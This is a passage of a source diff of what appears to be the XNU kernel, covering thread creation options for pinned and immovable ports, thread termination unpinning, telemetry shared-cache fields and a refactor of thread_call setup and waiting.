File: kern/task_swap.h - * - * Task residency management primitives declarations. - */ - -#ifndef _KERN_TASK_SWAP_H_ -#define _KERN_TASK_SWAP_H_ - -#include - -/* - * swap states - */ -#define TASK_SW_UNSWAPPABLE 1 /* not swappable */ -#define TASK_SW_IN 2 /* swapped in (resident) */ -#define TASK_SW_OUT 3 /* swapped out (non-resident) */ -#define TASK_SW_COMING_IN 4 /* about to be swapped in */ -#define TASK_SW_GOING_OUT 5 /* being swapped out */ - -/* - * swap flags - */ -#define TASK_SW_MAKE_UNSWAPPABLE 0x01 /* make it unswappable */ -#define TASK_SW_WANT_IN 0x02 /* sleeping on state */ -#define TASK_SW_ELIGIBLE 0x04 /* eligible for swapping */ - -/* - * exported routines - */ -extern void task_swapper_init(void); -extern kern_return_t task_swapin( - task_t, /* task */ - boolean_t); /* make_unswappable */ -extern kern_return_t task_swapout(task_t /* task */); -extern void task_swapper(void); -extern void task_swap_swapout_thread(void); -extern void compute_vm_averages(void); -extern kern_return_t task_swappable( - host_priv_t, /* host */ - task_t, /* task */ - boolean_t); /* swappable */ -extern void task_swapout_eligible(task_t /* task */); -extern void task_swapout_ineligible(task_t /* task */); -extern void swapout_ast(void); - -#endif /* _KERN_TASK_SWAP_H_ */ diff --git a/osfmk/kern/telemetry.c b/osfmk/kern/telemetry.c index b777052d4..dd71cf230 100644 --- a/osfmk/kern/telemetry.c +++ b/osfmk/kern/telemetry.c @@ -495,31 +495,6 @@ telemetry_take_sample(thread_t thread, uint8_t microsnapshot_flags, struct micro } bool user64_va = task_has_64Bit_addr(task); - /* - * Find the actual [slid] address of the shared cache's UUID, and copy it in from userland. - */ - int shared_cache_uuid_valid = 0; - uint64_t shared_cache_base_address = 0; - struct _dyld_cache_header shared_cache_header = {}; - uint64_t shared_cache_slide = 0; - - /* - * Don't copy in the entire shared cache header; we only need the UUID. Calculate the - * offset of that one field. - */ - int sc_header_uuid_offset = (char *)&shared_cache_header.uuid - (char *)&shared_cache_header; - vm_shared_region_t sr = vm_shared_region_get(task); - if (sr != NULL) { - if ((vm_shared_region_start_address(sr, &shared_cache_base_address) == KERN_SUCCESS) && - (copyin(shared_cache_base_address + sc_header_uuid_offset, (char *)&shared_cache_header.uuid, - sizeof(shared_cache_header.uuid)) == 0)) { - shared_cache_uuid_valid = 1; - shared_cache_slide = sr->sr_slide; - } - // vm_shared_region_get() gave us a reference on the shared region. - vm_shared_region_deallocate(sr); - } - /* * Retrieve the array of UUID's for binaries used by this task. * We reach down into DYLD's data structures to find the array. @@ -670,7 +645,7 @@ copytobuffer: tsnap->system_time_in_terminated_threads = task->total_system_time; tsnap->suspend_count = task->suspend_count; tsnap->task_size = (typeof(tsnap->task_size))(get_task_phys_footprint(task) / PAGE_SIZE); - tsnap->faults = task->faults; + tsnap->faults = counter_load(&task->faults); tsnap->pageins = task->pageins; tsnap->cow_faults = task->cow_faults; /* @@ -713,9 +688,11 @@ copytobuffer: tsnap->ss_flags |= kUser64_p; } - if (shared_cache_uuid_valid) { - tsnap->shared_cache_slide = shared_cache_slide; - bcopy(shared_cache_header.uuid, tsnap->shared_cache_identifier, sizeof(shared_cache_header.uuid)); + + if (task->task_shared_region_slide != -1) { + tsnap->shared_cache_slide = task->task_shared_region_slide; + bcopy(task->task_shared_region_uuid, tsnap->shared_cache_identifier, + sizeof(task->task_shared_region_uuid)); } current_buffer->current_position += sizeof(struct task_snapshot); diff --git a/osfmk/kern/thread.c b/osfmk/kern/thread.c index 0c7bbc603..08740e361 100644 --- a/osfmk/kern/thread.c +++ b/osfmk/kern/thread.c @@ -97,7 +97,6 @@ #include #include #include -#include #include #include #include @@ -343,7 +342,7 @@ thread_corpse_continue(void) { thread_t thread = current_thread(); - thread_terminate_internal(thread); + thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE); /* * Handle the thread termination directly @@ -708,6 +707,12 @@ thread_deallocate_complete( thread->thread_magic = 0; #endif /* MACH_ASSERT */ + lck_mtx_lock(&tasks_threads_lock); + assert(terminated_threads_count > 0); + queue_remove(&terminated_threads, thread, thread_t, threads); + terminated_threads_count--; + lck_mtx_unlock(&tasks_threads_lock); + zfree(thread_zone, thread); } @@ -899,6 +904,8 @@ thread_terminate_queue_invoke(mpsc_queue_chain_t e, lck_mtx_lock(&tasks_threads_lock); queue_remove(&threads, thread, thread_t, threads); threads_count--; + queue_enter(&terminated_threads, thread, thread_t, threads); + terminated_threads_count++; lck_mtx_unlock(&tasks_threads_lock); thread_deallocate(thread); @@ -1050,10 +1057,14 @@ thread_daemon_init(void) } } -#define TH_OPTION_NONE 0x00 -#define TH_OPTION_NOCRED 0x01 -#define TH_OPTION_NOSUSP 0x02 -#define TH_OPTION_WORKQ 0x04 +__options_decl(thread_create_internal_options_t, uint32_t, { + TH_OPTION_NONE = 0x00, + TH_OPTION_NOCRED = 0x01, + TH_OPTION_NOSUSP = 0x02, + TH_OPTION_WORKQ = 0x04, + TH_OPTION_IMMOVABLE = 0x08, + TH_OPTION_PINNED = 0x10, +}); /* * Create a new thread. @@ -1065,13 +1076,14 @@ static kern_return_t thread_create_internal( task_t parent_task, integer_t priority, - thread_continue_t continuation, + thread_continue_t continuation, void *parameter, - int options, + thread_create_internal_options_t options, thread_t *out_thread) { thread_t new_thread; - static thread_t first_thread; + static thread_t first_thread; + ipc_thread_init_options_t init_options = IPC_THREAD_INIT_NONE; /* * Allocate a thread and initialize static fields @@ -1089,6 +1101,14 @@ thread_create_internal( init_thread_from_template(new_thread); } + if (options & TH_OPTION_PINNED) { + init_options |= IPC_THREAD_INIT_PINNED; + } + + if (options & TH_OPTION_IMMOVABLE) { + init_options |= IPC_THREAD_INIT_IMMOVABLE; + } + os_ref_init_count(&new_thread->ref_count, &thread_refgrp, 2); #if DEBUG || DEVELOPMENT queue_init(&new_thread->t_temp_alloc_list); @@ -1132,7 +1152,7 @@ thread_create_internal( lck_mtx_init(&new_thread->mutex, &thread_lck_grp, LCK_ATTR_NULL); - ipc_thread_init(new_thread); + ipc_thread_init(new_thread, init_options); new_thread->continuation = continuation; new_thread->parameter = parameter; @@ -1363,14 +1383,15 @@ thread_create_internal( } static kern_return_t -thread_create_internal2( - task_t task, - thread_t *new_thread, - boolean_t from_user, - thread_continue_t continuation) +thread_create_with_options_internal( + task_t task, + thread_t *new_thread, + boolean_t from_user, + thread_create_internal_options_t options, + thread_continue_t continuation) { kern_return_t result; - thread_t thread; + thread_t thread; if (task == TASK_NULL || task == kernel_task) { return KERN_INVALID_ARGUMENT; @@ -1383,7 +1404,7 @@ thread_create_internal2( } #endif - result = thread_create_internal(task, -1, continuation, NULL, TH_OPTION_NONE, &thread); + result = thread_create_internal(task, -1, continuation, NULL, options, &thread); if (result != KERN_SUCCESS) { return result; } @@ -1417,7 +1438,30 @@ thread_create( task_t task, thread_t *new_thread) { - return thread_create_internal2(task, new_thread, FALSE, (thread_continue_t)thread_bootstrap_return); + return thread_create_with_options_internal(task, new_thread, FALSE, TH_OPTION_NONE, + (thread_continue_t)thread_bootstrap_return); +} + +/* + * Create a thread that has its itk_self pinned + * Deprecated, should be cleanup once rdar://70892168 lands + */ +kern_return_t +thread_create_pinned( + task_t task, + thread_t *new_thread) +{ + return thread_create_with_options_internal(task, new_thread, FALSE, + TH_OPTION_PINNED | TH_OPTION_IMMOVABLE, (thread_continue_t)thread_bootstrap_return); +} + +kern_return_t +thread_create_immovable( + task_t task, + thread_t *new_thread) +{ + return thread_create_with_options_internal(task, new_thread, FALSE, + TH_OPTION_IMMOVABLE, (thread_continue_t)thread_bootstrap_return); } kern_return_t @@ -1425,7 +1469,8 @@ thread_create_from_user( task_t task, thread_t *new_thread) { - return thread_create_internal2(task, new_thread, TRUE, (thread_continue_t)thread_bootstrap_return); + return thread_create_with_options_internal(task, new_thread, TRUE, TH_OPTION_NONE, + (thread_continue_t)thread_bootstrap_return); } kern_return_t @@ -1434,7 +1479,7 @@ thread_create_with_continuation( thread_t *new_thread, thread_continue_t continuation) { - return thread_create_internal2(task, new_thread, FALSE, continuation); + return thread_create_with_options_internal(task, new_thread, FALSE, TH_OPTION_NONE, continuation); } /* @@ -1487,13 +1532,24 @@ thread_create_waiting_internal( kern_return_t thread_create_waiting( - task_t task, - thread_continue_t continuation, - event_t event, - thread_t *new_thread) + task_t task, + thread_continue_t continuation, + event_t event, + th_create_waiting_options_t options, + thread_t *new_thread) { + thread_create_internal_options_t ci_options = TH_OPTION_NONE; + + assert((options & ~TH_CREATE_WAITING_OPTION_MASK) == 0); + if (options & TH_CREATE_WAITING_OPTION_PINNED) { + ci_options |= TH_OPTION_PINNED; + } + if (options & TH_CREATE_WAITING_OPTION_IMMOVABLE) { + ci_options |= TH_OPTION_IMMOVABLE; + } + return thread_create_waiting_internal(task, continuation, event, - kThreadWaitNone, TH_OPTION_NONE, new_thread); + kThreadWaitNone, ci_options, new_thread); } @@ -1605,7 +1661,13 @@ thread_create_workq_waiting( thread_continue_t continuation, thread_t *new_thread) { - int options = TH_OPTION_NOCRED | TH_OPTION_NOSUSP | TH_OPTION_WORKQ; + /* + * Create thread, but don't pin control port just yet, in case someone calls + * task_threads() and deallocates pinned port before kernel copyout happens, + * which will result in pinned port guard exception. Instead, pin and make + * it immovable atomically at copyout during workq_setup_and_run(). + */ + int options = TH_OPTION_NOCRED | TH_OPTION_NOSUSP | TH_OPTION_WORKQ | TH_OPTION_IMMOVABLE; return thread_create_waiting_internal(task, continuation, NULL, kThreadWaitParkedWorkQueue, options, new_thread); } @@ -2068,8 +2130,6 @@ thread_wire_internal( return KERN_INVALID_ARGUMENT; } - assert(host_priv == &realhost); - if (prev_state) { *prev_state = (thread->options & TH_OPT_VMPRIV) != 0; } @@ -3163,7 +3223,7 @@ thread_port_with_flavor_notify(mach_msg_header_t *msg) ip_unlock(port); return; } - thread = (thread_t)port->ip_kobject; + thread = (thread_t)ipc_kobject_get(port); kotype = ip_kotype(port); if (thread != THREAD_NULL) { assert((IKOT_THREAD_READ == kotype) || (IKOT_THREAD_INSPECT == kotype)); @@ -3176,28 +3236,39 @@ thread_port_with_flavor_notify(mach_msg_header_t *msg) return; } + if (kotype == IKOT_THREAD_READ) { + flavor = THREAD_FLAVOR_READ; + } else { + flavor = THREAD_FLAVOR_INSPECT; + } + thread_mtx_lock(thread); ip_lock(port); - require_ip_active(port); /* + * If the port is no longer active, then ipc_thread_terminate() ran + * and destroyed the kobject already. Just deallocate the task + * ref we took and go away. + * + * It is also possible that several nsrequests are in flight, + * only one shall NULL-out the port entry, and this is the one + * that gets to dealloc the port. + * * Check for a stale no-senders notification. A call to any function * that vends out send rights to this port could resurrect it between * this notification being generated and actually being handled here. */ - if (port->ip_srights > 0) { + if (!ip_active(port) || + thread->ith_thread_ports[flavor] != port || + port->ip_srights > 0) { ip_unlock(port); thread_mtx_unlock(thread); thread_deallocate(thread); return; } - if (kotype == IKOT_THREAD_READ) { - flavor = THREAD_FLAVOR_READ; - } else { - flavor = THREAD_FLAVOR_INSPECT; - } - assert(thread->ith_self[flavor] == port); - thread->ith_self[flavor] = IP_NULL; - port->ip_kobject = IKOT_NONE; + + assert(thread->ith_thread_ports[flavor] == port); + thread->ith_thread_ports[flavor] = IP_NULL; + ipc_kobject_set_atomically(port, IKO_NULL, IKOT_NONE); ip_unlock(port); thread_mtx_unlock(thread); thread_deallocate(thread); diff --git a/osfmk/kern/thread.h b/osfmk/kern/thread.h index 475f0c678..9f61d1fc4 100644 --- a/osfmk/kern/thread.h +++ b/osfmk/kern/thread.h @@ -256,6 +256,9 @@ struct thread { vm_offset_t kernel_stack; /* current kernel stack */ vm_offset_t reserved_stack; /* reserved kernel stack */ + /*** Machine-dependent state ***/ + struct machine_thread machine; + #if KASAN struct kasan_thread_data kasan_data; #endif @@ -516,13 +519,14 @@ struct thread { /* Miscellaneous bits guarded by mutex */ uint32_t - active:1, /* Thread is active and has not been terminated */ - started:1, /* Thread has been started after creation */ - static_param:1, /* Disallow policy parameter changes */ - inspection:1, /* TRUE when task is being inspected by crash reporter */ - policy_reset:1, /* Disallow policy parameter changes on terminating threads */ - suspend_parked:1, /* thread parked in thread_suspended */ - corpse_dup:1, /* TRUE when thread is an inactive duplicate in a corpse */ + active:1, /* Thread is active and has not been terminated */ + ipc_active:1, /* IPC with the thread ports is allowed */ + started:1, /* Thread has been started after creation */ + static_param:1, /* Disallow policy parameter changes */ + inspection:1, /* TRUE when task is being inspected by crash reporter */ + policy_reset:1, /* Disallow policy parameter changes on terminating threads */ + suspend_parked:1, /* thread parked in thread_suspended */ + corpse_dup:1, /* TRUE when thread is an inactive duplicate in a corpse */ :0; decl_lck_mtx_data(, mutex); @@ -531,8 +535,9 @@ struct thread { * Different flavors of thread port. * These flavors THREAD_FLAVOR_* are defined in mach_types.h */ - struct ipc_port *ith_self[THREAD_SELF_PORT_COUNT]; /* does not hold right */ + struct ipc_port *ith_thread_ports[THREAD_SELF_PORT_COUNT]; /* does not hold right */ struct ipc_port *ith_settable_self; /* a send right */ + struct ipc_port *ith_self; /* immovable/pinned thread port */ struct ipc_port *ith_special_reply_port; /* ref to special reply port */ struct exception_action *exc_actions; @@ -593,9 +598,6 @@ struct thread { void *hv_thread_target; #endif /* HYPERVISOR */ - /*** Machine-dependent state ***/ - struct machine_thread machine; - /* Statistics accumulated per-thread and aggregated per-task */ uint32_t syscalls_unix; uint32_t syscalls_mach; @@ -662,13 +664,13 @@ struct thread { #if SCHED_TRACE_THREAD_WAKEUPS uintptr_t thread_wakeup_bt[64]; #endif - turnstile_update_flags_t inheritor_flags; /* inheritor flags for inheritor field */ - block_hint_t pending_block_hint; - block_hint_t block_hint; /* What type of primitive last caused us to block. */ - integer_t decompressions; /* Per-thread decompressions counter to be added to per-task decompressions counter */ - int thread_region_page_shift; /* Page shift that this thread would like to use when */ - /* introspecting a task. This is currently being used */ - /* by footprint which uses a thread for each task being inspected. */ + turnstile_update_flags_t inheritor_flags; /* inheritor flags for inheritor field */ + block_hint_t pending_block_hint; + block_hint_t block_hint; /* What type of primitive last caused us to block. */ + integer_t decompressions; /* Per-thread decompressions counter to be added to per-task decompressions counter */ + int thread_region_page_shift; /* Page shift that this thread would like to use when */ + /* introspecting a task. This is currently being used */ + /* by footprint which uses a thread for each task being inspected. */ }; #define ith_state saved.receive.state @@ -740,8 +742,14 @@ extern void thread_read_deallocate( extern void thread_terminate_self(void); +__options_decl(thread_terminate_options_t, uint32_t, { + TH_TERMINATE_OPTION_NONE, + TH_TERMINATE_OPTION_UNPIN +}); + extern kern_return_t thread_terminate_internal( - thread_t thread); + thread_t thread, + thread_terminate_options_t options); extern void thread_start( thread_t thread) __attribute__ ((noinline)); @@ -1067,10 +1075,18 @@ extern kern_return_t thread_create_with_continuation( thread_t *new_thread, thread_continue_t continuation); -extern kern_return_t thread_create_waiting(task_t task, - thread_continue_t continuation, - event_t event, - thread_t *new_thread); +/* thread_create_waiting options */ +__options_decl(th_create_waiting_options_t, uint32_t, { + TH_CREATE_WAITING_OPTION_PINNED = 0x10, + TH_CREATE_WAITING_OPTION_IMMOVABLE = 0x20, +}); +#define TH_CREATE_WAITING_OPTION_MASK 0x30 + +extern kern_return_t thread_create_waiting(task_t task, + thread_continue_t continuation, + event_t event, + th_create_waiting_options_t options, + thread_t *new_thread); extern kern_return_t thread_create_workq_waiting( task_t task, @@ -1381,6 +1397,7 @@ void thread_clear_eager_preempt(thread_t thread); void thread_set_honor_qlimit(thread_t thread); void thread_clear_honor_qlimit(thread_t thread); extern ipc_port_t convert_thread_to_port(thread_t); +extern ipc_port_t convert_thread_to_port_pinned(thread_t); extern ipc_port_t convert_thread_inspect_to_port(thread_inspect_t); extern ipc_port_t convert_thread_read_to_port(thread_read_t); extern boolean_t is_vm_privileged(void); @@ -1391,6 +1408,9 @@ extern void thread_iokit_tls_set(uint32_t index, void * data); extern void thread_port_with_flavor_notify(mach_msg_header_t *msg); extern int thread_self_region_page_shift(void); extern void thread_self_region_page_shift_set(int pgshift); +extern kern_return_t thread_create_pinned(task_t task, thread_t *new_thread); +extern kern_return_t thread_create_immovable(task_t task, thread_t *new_thread); +extern kern_return_t thread_terminate_pinned(thread_t thread); #endif /* KERNEL_PRIVATE */ __END_DECLS diff --git a/osfmk/kern/thread_act.c b/osfmk/kern/thread_act.c index ccfb5eb3d..679c11621 100644 --- a/osfmk/kern/thread_act.c +++ b/osfmk/kern/thread_act.c @@ -157,9 +157,11 @@ thread_start_in_assert_wait( */ kern_return_t thread_terminate_internal( - thread_t thread) + thread_t thread, + thread_terminate_options_t options) { kern_return_t result = KERN_SUCCESS; + boolean_t test_pin_bit = false; thread_mtx_lock(thread); @@ -173,6 +175,8 @@ thread_terminate_internal( } else { thread_start(thread); } + /* This bit can be reliably tested only if the thread is still active */ + test_pin_bit = (options == TH_TERMINATE_OPTION_UNPIN) ? true : false; } else { result = KERN_TERMINATED; } @@ -181,6 +185,13 @@ thread_terminate_internal( thread_affinity_terminate(thread); } + /* + * thread_terminate shouldn't be allowed on pthread + * Until thread_terminate is disallowed for pthreads, always unpin the pinned port + * when the thread is being terminated. + */ + ipc_thread_port_unpin(thread->ith_self, test_pin_bit); + thread_mtx_unlock(thread); if (thread != current_thread() && result == KERN_SUCCESS) { @@ -206,7 +217,7 @@ thread_terminate( return KERN_FAILURE; } - kern_return_t result = thread_terminate_internal(thread); + kern_return_t result = thread_terminate_internal(thread, TH_TERMINATE_OPTION_NONE); /* * If a kernel thread is terminating itself, force handle the APC_AST here. @@ -225,6 +236,20 @@ thread_terminate( return result; } +kern_return_t +thread_terminate_pinned( + thread_t thread) +{ + if (thread == THREAD_NULL) { + return KERN_INVALID_ARGUMENT; + } + + assert(thread->task != kernel_task); + + kern_return_t result = thread_terminate_internal(thread, TH_TERMINATE_OPTION_UNPIN); + return result; +} + /* * Suspend execution of the specified thread. * This is a recursive-style suspension of the thread, a count of diff --git a/osfmk/kern/thread_call.c b/osfmk/kern/thread_call.c index afe86a612..6bcca3720 100644 --- a/osfmk/kern/thread_call.c +++ b/osfmk/kern/thread_call.c @@ -56,8 +56,6 @@ static ZONE_DECLARE(thread_call_zone, "thread_call", sizeof(thread_call_data_t), ZC_NOENCRYPT); -static struct waitq daemon_waitq; - typedef enum { TCF_ABSOLUTE = 0, TCF_CONTINUOUS = 1, @@ -92,6 +90,8 @@ static struct thread_call_group { uint32_t target_thread_count; thread_call_group_flags_t tcg_flags; + + struct waitq waiters_waitq; } thread_call_groups[THREAD_CALL_INDEX_MAX] = { [THREAD_CALL_INDEX_HIGH] = { .tcg_name = "high", @@ -458,6 +458,8 @@ thread_call_group_setup(thread_call_group_t group) timer_call_setup(&group->dealloc_timer, thread_call_dealloc_timer, group); + waitq_init(&group->waiters_waitq, SYNC_POLICY_DISABLE_IRQ); + /* Reverse the wait order so we re-use the most recently parked thread from the pool */ waitq_init(&group->idle_waitq, SYNC_POLICY_REVERSED | SYNC_POLICY_DISABLE_IRQ); } @@ -530,23 +532,57 @@ thread_call_initialize(void) } void -thread_call_setup( +thread_call_setup_with_options( thread_call_t call, thread_call_func_t func, - thread_call_param_t param0) + thread_call_param_t param0, + thread_call_priority_t pri, + thread_call_options_t options) { bzero(call, sizeof(*call)); *call = (struct thread_call) { .tc_func = func, .tc_param0 = param0, - - /* - * Thread calls default to the HIGH group - * unless otherwise specified. - */ - .tc_index = THREAD_CALL_INDEX_HIGH, }; + + switch (pri) { + case THREAD_CALL_PRIORITY_HIGH: + call->tc_index = THREAD_CALL_INDEX_HIGH; + break; + case THREAD_CALL_PRIORITY_KERNEL: + call->tc_index = THREAD_CALL_INDEX_KERNEL; + break; + case THREAD_CALL_PRIORITY_USER: + call->tc_index = THREAD_CALL_INDEX_USER; + break; + case THREAD_CALL_PRIORITY_LOW: + call->tc_index = THREAD_CALL_INDEX_LOW; + break; + case THREAD_CALL_PRIORITY_KERNEL_HIGH: + call->tc_index = THREAD_CALL_INDEX_KERNEL_HIGH; + break; + default: + panic("Invalid thread call pri value: %d", pri); + break; + } + + if (options & THREAD_CALL_OPTIONS_ONCE) { + call->tc_flags |= THREAD_CALL_ONCE; + } + if (options & THREAD_CALL_OPTIONS_SIGNAL) { + call->tc_flags |= THREAD_CALL_SIGNAL | THREAD_CALL_ONCE; + } +} + +void +thread_call_setup( + thread_call_t call, + thread_call_func_t func, + thread_call_param_t param0) +{ + thread_call_setup_with_options(call, func, param0, + THREAD_CALL_PRIORITY_HIGH, 0); } static void @@ -592,8 +628,8 @@ _internal_call_allocate(thread_call_func_t func, thread_call_param_t param0) thread_call_internal_queue_count--; thread_call_setup(call, func, param0); - call->tc_refs = 0; - call->tc_flags = 0; /* THREAD_CALL_ALLOC not set, do not free back to zone */ + /* THREAD_CALL_ALLOC not set, do not free back to zone */ + assert((call->tc_flags & THREAD_CALL_ALLOC) == 0); enable_ints_and_unlock(group, s); return call; @@ -953,35 +989,11 @@ thread_call_allocate_with_options( thread_call_priority_t pri, thread_call_options_t options) { - thread_call_t call = thread_call_allocate(func, param0); - - switch (pri) { - case THREAD_CALL_PRIORITY_HIGH: - call->tc_index = THREAD_CALL_INDEX_HIGH; - break; - case THREAD_CALL_PRIORITY_KERNEL: - call->tc_index = THREAD_CALL_INDEX_KERNEL; - break; - case THREAD_CALL_PRIORITY_USER: - call->tc_index = THREAD_CALL_INDEX_USER; - break; - case THREAD_CALL_PRIORITY_LOW: - call->tc_index = THREAD_CALL_INDEX_LOW; - break; - case THREAD_CALL_PRIORITY_KERNEL_HIGH: - call->tc_index = THREAD_CALL_INDEX_KERNEL_HIGH; - break; - default: - panic("Invalid thread call pri value: %d", pri); - break; - } + thread_call_t call = zalloc(thread_call_zone); - if (options & THREAD_CALL_OPTIONS_ONCE) { - call->tc_flags |= THREAD_CALL_ONCE; - } - if (options & THREAD_CALL_OPTIONS_SIGNAL) { - call->tc_flags |= THREAD_CALL_SIGNAL | THREAD_CALL_ONCE; - } + thread_call_setup_with_options(call, func, param0, pri, options); + call->tc_refs = 1; + call->tc_flags |= THREAD_CALL_ALLOC; return call; } @@ -1039,13 +1051,8 @@ thread_call_allocate( thread_call_func_t func, thread_call_param_t param0) { - thread_call_t call = zalloc(thread_call_zone); - - thread_call_setup(call, func, param0); - call->tc_refs = 1; - call->tc_flags = THREAD_CALL_ALLOC; - - return call; + return thread_call_allocate_with_options(func, param0, + THREAD_CALL_PRIORITY_HIGH, 0); } /* @@ -1422,7 +1429,7 @@ thread_call_wake( if (group->idle_count) { __assert_only kern_return_t kr; - kr = waitq_wakeup64_one(&group->idle_waitq, NO_EVENT64, + kr = waitq_wakeup64_one(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_AWAKENED, WAITQ_ALL_PRIORITIES); assert(kr == KERN_SUCCESS); @@ -1438,7 +1445,7 @@ thread_call_wake( if (thread_call_group_should_add_thread(group) && os_atomic_cmpxchg(&thread_call_daemon_awake, false, true, relaxed)) { - waitq_wakeup64_all(&daemon_waitq, NO_EVENT64, + waitq_wakeup64_all(&daemon_waitq, CAST_EVENT64_T(&thread_call_daemon_awake), THREAD_AWAKENED, WAITQ_ALL_PRIORITIES); } } @@ -1498,10 +1505,11 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s) bool repend = false; bool signal = call->tc_flags & THREAD_CALL_SIGNAL; + bool alloc = call->tc_flags & THREAD_CALL_ALLOC; call->tc_finish_count++; - if (!signal) { + if (!signal && alloc) { /* The thread call thread owns a ref until the call is finished */ if (call->tc_refs <= 0) { panic("thread_call_finish: detected over-released thread call: %p", call); @@ -1512,7 +1520,8 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s) thread_call_flags_t old_flags = call->tc_flags; call->tc_flags &= ~(THREAD_CALL_RESCHEDULE | THREAD_CALL_RUNNING | THREAD_CALL_WAIT); - if (call->tc_refs != 0 && (old_flags & THREAD_CALL_RESCHEDULE) != 0) { + if ((!alloc || call->tc_refs != 0) && + (old_flags & THREAD_CALL_RESCHEDULE) != 0) { assert(old_flags & THREAD_CALL_ONCE); thread_call_flavor_t flavor = thread_call_get_flavor(call); @@ -1541,7 +1550,7 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s) } } - if (!signal && (call->tc_refs == 0)) { + if (!signal && alloc && call->tc_refs == 0) { if ((old_flags & THREAD_CALL_WAIT) != 0) { panic("Someone waiting on a thread call that is scheduled for free: %p\n", call->tc_func); } @@ -1557,12 +1566,19 @@ thread_call_finish(thread_call_t call, thread_call_group_t group, spl_t *s) if ((old_flags & THREAD_CALL_WAIT) != 0) { /* - * Dropping lock here because the sched call for the - * high-pri group can take the big lock from under - * a thread lock. + * This may wake up a thread with a registered sched_call. + * That call might need the group lock, so we drop the lock + * to avoid deadlocking. + * + * We also must use a separate waitq from the idle waitq, as + * this path goes waitq lock->thread lock->group lock, but + * the idle wait goes group lock->waitq_lock->thread_lock. */ thread_call_unlock(group); - thread_wakeup((event_t)call); + + waitq_wakeup64_all(&group->waiters_waitq, CAST_EVENT64_T(call), + THREAD_AWAKENED, WAITQ_ALL_PRIORITIES); + thread_call_lock_spin(group); /* THREAD_CALL_SIGNAL call may have been freed */ } @@ -1668,9 +1684,20 @@ thread_call_thread( */ bool needs_finish = false; if (call->tc_flags & THREAD_CALL_ALLOC) { + call->tc_refs++; /* Delay free until we're done */ + } + if (call->tc_flags & (THREAD_CALL_ALLOC | THREAD_CALL_ONCE)) { + /* + * If THREAD_CALL_ONCE is used, and the timer wasn't + * THREAD_CALL_ALLOC, then clients swear they will use + * thread_call_cancel_wait() before destroying + * the thread call. + * + * Else, the storage for the thread call might have + * disappeared when thread_call_invoke() ran. + */ needs_finish = true; call->tc_flags |= THREAD_CALL_RUNNING; - call->tc_refs++; /* Delay free until we're done */ } thc_state.thc_call = call; @@ -1699,7 +1726,7 @@ thread_call_thread( s = disable_ints_and_lock(group); if (needs_finish) { - /* Release refcount, may free */ + /* Release refcount, may free, may temporarily drop lock */ thread_call_finish(call, group, &s); } } @@ -1740,7 +1767,7 @@ thread_call_thread( } /* Wait for more work (or termination) */ - wres = waitq_assert_wait64(&group->idle_waitq, NO_EVENT64, THREAD_INTERRUPTIBLE, 0); + wres = waitq_assert_wait64(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_INTERRUPTIBLE, 0); if (wres != THREAD_WAITING) { panic("kcall worker unable to assert wait?"); } @@ -1752,7 +1779,7 @@ thread_call_thread( if (group->idle_count < group->target_thread_count) { group->idle_count++; - waitq_assert_wait64(&group->idle_waitq, NO_EVENT64, THREAD_UNINT, 0); /* Interrupted means to exit */ + waitq_assert_wait64(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_UNINT, 0); /* Interrupted means to exit */ enable_ints_and_unlock(group, s); @@ -1815,7 +1842,7 @@ thread_call_daemon_continue(__unused void *arg) } } while (os_atomic_load(&thread_call_daemon_awake, relaxed)); - waitq_assert_wait64(&daemon_waitq, NO_EVENT64, THREAD_UNINT, 0); + waitq_assert_wait64(&daemon_waitq, CAST_EVENT64_T(&thread_call_daemon_awake), THREAD_UNINT, 0); if (os_atomic_load(&thread_call_daemon_awake, relaxed)) { clear_wait(current_thread(), THREAD_AWAKENED); @@ -2025,7 +2052,7 @@ thread_call_dealloc_timer( if (now > group->idle_timestamp + thread_call_dealloc_interval_abs) { terminated = true; group->idle_count--; - res = waitq_wakeup64_one(&group->idle_waitq, NO_EVENT64, + res = waitq_wakeup64_one(&group->idle_waitq, CAST_EVENT64_T(group), THREAD_INTERRUPTED, WAITQ_ALL_PRIORITIES); if (res != KERN_SUCCESS) { panic("Unable to wake up idle thread for termination?"); @@ -2066,6 +2093,11 @@ thread_call_dealloc_timer( * * Takes the thread call lock locked, returns unlocked * This lets us avoid a spurious take/drop after waking up from thread_block + * + * This thread could be a thread call thread itself, blocking and therefore making a + * sched_call upcall into the thread call subsystem, needing the group lock. + * However, we're saved from deadlock because the 'block' upcall is made in + * thread_block, not in assert_wait. */ static bool thread_call_wait_once_locked(thread_call_t call, spl_t s) @@ -2083,7 +2115,7 @@ thread_call_wait_once_locked(thread_call_t call, spl_t s) /* call is running, so we have to wait for it */ call->tc_flags |= THREAD_CALL_WAIT; - wait_result_t res = assert_wait(call, THREAD_UNINT); + wait_result_t res = waitq_assert_wait64(&group->waiters_waitq, CAST_EVENT64_T(call), THREAD_UNINT, 0); if (res != THREAD_WAITING) { panic("Unable to assert wait: %d", res); } @@ -2162,7 +2194,9 @@ thread_call_wait_locked(thread_call_t call, spl_t s) while (call->tc_finish_count < submit_count) { call->tc_flags |= THREAD_CALL_WAIT; - wait_result_t res = assert_wait(call, THREAD_UNINT); + wait_result_t res = waitq_assert_wait64(&group->waiters_waitq, + CAST_EVENT64_T(call), THREAD_UNINT, 0); + if (res != THREAD_WAITING) { panic("Unable to assert wait: %d", res); } diff --git a/osfmk/kern/thread_call.h b/osfmk/kern/thread_call.h index 254ef28b8..1e0f2fb96 100644 --- a/osfmk/kern/thread_call.h +++ b/osfmk/kern/thread_call.h @@ -400,6 +400,13 @@ extern void thread_call_setup( thread_call_func_t func, thread_call_param_t param0); +extern void thread_call_setup_with_options( + thread_call_t call, + thread_call_func_t func, + thread_call_param_t param0, + thread_call_priority_t pri, + thread_call_options_t options); + extern void thread_call_delayed_timer_rescan_all(void); extern uint64_t thread_call_get_armed_deadline(thread_call_t call); diff --git a/osfmk/kern/thread_group.c b/osfmk/kern/thread_group.c index 147925485..ca8228f6d 100644 --- a/osfmk/kern/thread_group.c +++ b/osfmk/kern/thread_group.c @@ -812,8 +812,8 @@ thread_group_vm_add(void) thread_set_thread_group(current_thread(), thread_group_find_by_id_and_retain(THREAD_GROUP_VM), false); } -uint64_t -kdp_thread_group_get_flags(struct thread_group *tg) +uint32_t 